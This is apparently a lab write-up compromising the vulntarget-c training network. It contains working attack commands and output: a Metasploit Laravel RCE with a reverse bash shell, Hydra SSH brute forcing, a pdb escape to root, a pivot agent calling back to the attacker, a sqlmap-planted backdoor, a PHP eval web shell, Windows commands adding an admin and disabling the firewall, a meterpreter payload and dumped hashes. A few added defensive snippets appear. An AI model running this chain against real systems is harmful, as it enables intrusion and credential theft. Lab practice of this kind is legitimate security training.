Lab topology diagram
Nmap
[root@Hacking] /home/kali/Desktop
❯ nmap 192.242.168.203 -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 27:bb:30:76:e1:47:ab:24:f0:89:5a:05:10:66:e4:7e (RSA)
| 256 ab:df:49:e1:14:43:b1:75:ad:2f:6f:61:37:eb:24:ac (ECDSA)
|_ 256 58:ed:00:9a:e5:37:1b:e6:f5:6c:d5:a3:c7:f0:32:67 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Laravel
|_http-server-header: Apache/2.4.41 (Ubuntu)
65534/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ Auth decrypt failed
Laravel
Port 80 serves a Laravel application, and the page footer shows the version.
[root@Hacking] /home/kali/vulntarget-c
❯ nuclei -u http://192.242.168.203/
[nuclei ASCII banner] v3.4.2 projectdiscovery.io
[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 8277
[INF] Executing 8074 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 203 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1787 (Reduced 1676 Requests)
[CVE-2021-3129] [http] [critical] http://192.242.168.203/_ignition/execute-solution ["uid=33(www-data) gid=33(www-data) groups=33(www-data)"]
[robots-txt] [http] [info] http://192.242.168.203/robots.txt
[laravel-debug-enabled] [http] [medium] http://192.242.168.203/_ignition/health-check
Here I chose to use Metasploit to exploit it.
msf6 exploit(multi/php/ignition_laravel_debug_rce) > show options
Module options (exploit/multi/php/ignition_laravel_debug_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGFILE no Laravel log file absolute path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.242.168.203 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /_ignition/execute-solution yes Ignition execute solution path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.188.168.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set ForceExploit true
www-data@ubuntu20:/$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 52:54:00:41:4a:66 brd ff:ff:ff:ff:ff:ff
inet 192.242.168.203/24 brd 192.242.168.255 scope global ens3
valid_lft forever preferred_lft forever
inet6 fe80::5054:ff:fe41:4a66/64 scope link
valid_lft forever preferred_lft forever
3: ens4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 52:54:00:41:4a:67 brd ff:ff:ff:ff:ff:ff
inet 10.0.20.141/24 brd 10.0.20.255 scope global ens4
valid_lft forever preferred_lft forever
inet6 fe80::5054:ff:fe41:4a67/64 scope link
valid_lft forever preferred_lft forever
4: ens5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 52:54:00:41:4a:68 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic ens5
valid_lft 84952sec preferred_lft 84952sec
inet6 fec0::5054:ff:fe41:4a68/64 scope site dynamic mngtmpaddr noprefixroute
valid_lft 86137sec preferred_lft 14137sec
inet6 fe80::5054:ff:fe41:4a68/64 scope link
valid_lft forever preferred_lft forever
Check which ports are listening
www-data@ubuntu20:/opt$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 10.0.2.15%ens5:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 4096 *:65534 *:*
Weak Pass
A user named vulntarget was found under /home on the first host, so I tried brute-forcing its SSH password.
[root@Hacking] /home/kali/vulntarget-c
❯ hydra -l vulntarget -P /home/kali/Desktop/passwd-top1000.txt 192.242.168.203 ssh -I -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-31 17:40:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ssh://192.242.168.203:22/
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "root" - 1 of 1000 [child 0] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "123456" - 2 of 1000 [child 1] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "1" - 3 of 1000 [child 2] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "raspberry" - 4 of 1000 [child 3] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "admin" - 5 of 1000 [child 4] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "password" - 6 of 1000 [child 5] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "raspberryraspberry993311" - 7 of 1000 [child 6] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "123456789" - 8 of 1000 [child 7] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "111111" - 9 of 1000 [child 8] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "P@ssw0rd" - 10 of 1000 [child 9] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "12345678" - 11 of 1000 [child 10] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "12345" - 12 of 1000 [child 11] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "anonymous@" - 13 of 1000 [child 12] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "1qaz@WSX" - 14 of 1000 [child 13] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "admin123" - 15 of 1000 [child 14] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "test" - 16 of 1000 [child 15] (0/0)
[22][ssh] host: 192.242.168.203 login: vulntarget password: root
1 of 1 target successfully completed, 1 valid password found
vulntarget's password turns out to be root. After switching to that user and checking sudo, (ALL:ALL) is already granted, so it can switch straight to root.
PDB
Let's still take a look at /opt/root.py.
#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb
port = random.randint(1025, 65535)
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'mortals':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())  # non-numeric input raises ValueError
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)  # any unhandled exception opens an interactive debugger on the server's terminal
finally:
    quit()
When run, the script opens a random port and waits for a password; the source gives it away as mortals. A quick search shows it is adapted from HTB Forge.
Two terminals are needed: one runs the server, the other connects and triggers an error, which drops the server into pdb.
(Pdb) os.system("echo 'root:root' | chpasswd")
First host compromised.
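For contrast, here is a hardened rewrite of the /opt/root.py service above. This is an added example, not the lab's own file: it keeps the same password and menu protocol but never calls pdb.post_mortem(), so a malformed request ends with an error reply and a log line instead of an interactive debugger running as root.

```python
#!/usr/bin/env python3
# Hardened rewrite of /opt/root.py above (added example, not the lab's code).
# The original calls pdb.post_mortem() on any exception, so one malformed
# request yields a Python prompt on the server terminal with root privileges.
# Here bad input gets an error reply, failures are logged per client, and
# commands are fixed argv lists, so no client data ever reaches a shell.
import logging
import socket
import subprocess

SECRET = b"mortals"  # same secret the lab script hard-codes
MENU = {1: ["ps", "aux"], 2: ["df"], 3: ["ss", "-lnt"]}  # fixed argv lists
def dispatch(raw: bytes) -> bytes:
    try:
        option = int(raw.strip().decode())
    except (ValueError, UnicodeDecodeError):
        return b"Invalid option\n"  # reject instead of raising into a debugger
    if option == 4:
        return b"Bye\n"
    if option not in MENU:
        return b"Invalid option\n"
    return subprocess.run(MENU[option], capture_output=True).stdout or b"(none)\n"

def handle_client(client: socket.socket) -> None:
    client.send(b"Enter the secret password: ")
    if client.recv(1024).strip() != SECRET:
        client.send(b"Wrong password!\n")
        return
    client.send(b"Welcome admin!\n")
    while True:
        client.send(b"\n[1] View processes\n[2] View free memory\n[3] View listening sockets\n[4] Quit\n")
        reply = dispatch(client.recv(1024))
        client.send(reply)
        if reply == b"Bye\n":
            return

def serve(host="127.0.0.1", port=0):  # port 0: the kernel picks a free port
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, port))
    sock.listen(1)
    print("Listening on %s:%d" % sock.getsockname())
    while True:
        client, _ = sock.accept()
        try:  # per-client isolation: log and keep serving, never drop into pdb
            with client:
                handle_client(client)
        except OSError as exc:
            logging.warning("client error: %s", exc)
if __name__ == "__main__":
    serve()
```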
Fscan
Scan the internal subnet (note: there is a firewall, so ICMP host discovery fails here).
root@ubuntu20:~# ./fscan -h 10.0.20.141/24 -np -nopoc
[fscan ASCII banner]
fscan version: 1.8.4
start infoscan
10.0.20.141:22 open
10.0.20.100:80 open
10.0.20.141:80 open
10.0.20.100:443 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://10.0.20.141 code:200 len:17473 title:Laravel
[*] WebTitle https://10.0.20.100 code:403 len:301 title:403 Forbidden
[+] InfoScan http://10.0.20.141 [Laravel]
[*] WebTitle http://10.0.20.100 code:200 len:30970 title:Online Veterinary Appointment System - PHP
[+] SSH 10.0.20.141:22:root root
已完成 4/4
Setting up a proxy
Stowaway is used here for the proxy.
root@ubuntu20:~# ./linux_x64_agent -c 192.188.168.128:6666 -s 123 --reconnect 8 &
OVAS
Browse to 10.0.20.100; the footer shows version v1.0.
- Online Veterinary Appointment System 1.0 - ‘Multiple’ SQL Injection - PHP webapps Exploit
Once here, just open any one of them.
[root@Hacking] /home/kali/vulntarget-c
❯ proxychains -q sqlmap -u 'http://10.0.20.100/admin/?page=appointments/view_details&id=6' -p id --batch
[root@Hacking] /home/kali/vulntarget-c
❯ pc -q sqlmap -u 'http://10.0.20.100/admin/?page=appointments/view_details&id=6' -p id --os-shell
[sqlmap ASCII banner] {1.9.2#stable} https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:09:33 /2025-08-31/
[20:09:33] [INFO] resuming back-end DBMS 'mysql'
[20:09:33] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'http://10.0.20.100/admin/login.php'. Do you want to apply it from now on? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=55jt5odloii...pbmsljh38l'). Do you want to use those [Y/n] Y
[20:09:35] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=appointments/view_details&id=6' AND (SELECT 8769 FROM (SELECT(SLEEP(5)))ADGB) AND 'qQni'='qQni
---
[20:09:35] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.7, Apache 2.4.48
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:09:35] [INFO] going to use a web backdoor for command prompt
[20:09:35] [INFO] fingerprinting the back-end DBMS operating system
[20:09:35] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
[20:09:45] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:/xampp/htdocs/ovas
[20:10:15] [WARNING] unable to automatically parse any web server path
[20:10:15] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/ovas/' via LIMIT 'LINES TERMINATED BY' method
[20:10:16] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/ovas/' - http://10.0.20.100:80/tmpudois.php
[20:10:16] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/ovas/' - http://10.0.20.100:80/tmpbbzvn.php
[20:10:16] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
sqlmap's built-in module gives command execution, and here it already runs with the highest privileges.
<?php
$a=array($_REQUEST['x']=>"3");
$b=array_keys($a)[0];
eval($b);
?>
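From the defender's side, both web footholds in this writeup leave distinctive traces in the Apache access log: the Ignition execute-solution requests flagged by nuclei (CVE-2021-3129, debug mode exposed) on the first host, and sqlmap's SLEEP()-based blind injection plus the tmpXXXXX.php stager on the OVAS host. The detection sketch below is an added example, not part of the original post; the log lines are constructed to mirror the requests shown above.

```python
# Detection sketch, added here and not part of the original post: it scans
# Apache combined-format access log lines for the web-side activity this
# walkthrough produces on both hosts: probes of the Laravel Ignition endpoints
# (CVE-2021-3129, debug mode exposed) and sqlmap's time-based blind injection
# and PHP stager drop against the OVAS id parameter. Log lines are constructed.
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Each rule sees the URL-decoded request path plus method and status code.
RULES = {
    "ignition-execute-solution": lambda r: r["method"] == "POST"
        and r["path"].startswith("/_ignition/execute-solution"),
    "laravel-debug-exposed": lambda r: r["path"].startswith("/_ignition/health-check")
        and r["status"] == "200",
    "sqli-time-based": lambda r: re.search(r"(?i)\bsleep\s*\(", r["path"]) is not None,
    "sqlmap-stager": lambda r: re.search(r"/tmp[a-z]{5}\.php(\?|$)", r["path"]) is not None,
}

def classify(line: str):
    """Return (ip, matched rule names) for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])  # match on the decoded query string
    hits = [name for name, pred in RULES.items() if pred(rec)]
    return (rec["ip"], hits) if hits else None

def scan(lines):
    """Classify every line; returns only the flagged ones in log order."""
    return [r for r in map(classify, lines) if r is not None]

SAMPLE_LOG = """\
10.0.2.2 - - [31/Aug/2025:17:09:58 +0800] "GET /_ignition/health-check HTTP/1.1" 200 27
10.0.2.2 - - [31/Aug/2025:17:10:03 +0800] "POST /_ignition/execute-solution HTTP/1.1" 200 512
10.0.20.141 - - [31/Aug/2025:20:09:35 +0800] "GET /admin/?page=appointments/view_details&id=6%27%20AND%20%28SELECT%208769%20FROM%20%28SELECT%28SLEEP%285%29%29%29ADGB%29%20AND%20%27qQni%27%3D%27qQni HTTP/1.1" 200 4120
10.0.20.141 - - [31/Aug/2025:20:10:16 +0800] "GET /tmpudois.php HTTP/1.1" 200 80
10.0.20.141 - - [31/Aug/2025:20:11:02 +0800] "GET /admin/?page=appointments/view_details&id=6 HTTP/1.1" 200 4120
""".splitlines()

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```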
MobaXterm
Enable RDP and add an administrator user.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0; Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0"
Once in, turn off Defender.
[root@Hacking] /home/kali/vulntarget-c
❯ msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > bind.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 496 bytes
Final size of exe file: 7168 bytes
Copy it over the remote desktop session and run it as administrator.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1000:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
Looking the hash up (MD5 decrypt) gives the password: Admin#123